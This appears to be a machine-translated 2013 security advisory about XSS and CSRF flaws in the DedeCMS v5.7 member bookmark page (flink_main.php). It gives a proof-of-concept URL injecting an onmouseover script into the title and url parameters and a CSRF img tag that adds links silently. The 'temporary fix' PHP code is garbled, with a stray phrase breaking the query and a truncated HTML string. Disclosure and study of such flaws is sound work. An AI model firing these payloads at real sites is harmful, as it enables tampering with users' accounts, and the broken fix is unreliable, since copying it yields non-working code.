DEDECMS v5. 7(2013-06-07) xss+csrf 0day-vulnerability warning-the black bar safety net

2013-07-11T00:00:00
ID MYHACK58:62201339585
Type myhack58
Reporter 佚名
Modified 2013-07-11T00:00:00

Description

Bookmark management existxss+csrf

http://localhost/dedecms/member/flink_main.php

xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'

CSRF:<img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">

Temporary fix:

function GetLinkList(&$dsql)

{

global $cfg_ml;

$dsql->SetQuery("SELECT * FROM #@__member_flink WHERE mid='".$ cfg_ml->m_id correspondence between."' ORDER BY aid DESC");

$dsql->Execute();

$j=0;

while($row = $dsql->GetArray())

{

$j++;

$line = "

<div class='item flink'>

<div class='itemHead' >

<div class='fRight'>

<span class='itemDigg'><a href='#' />";

echo $line;

}

if($j==0)

{

echo "no links";

}

}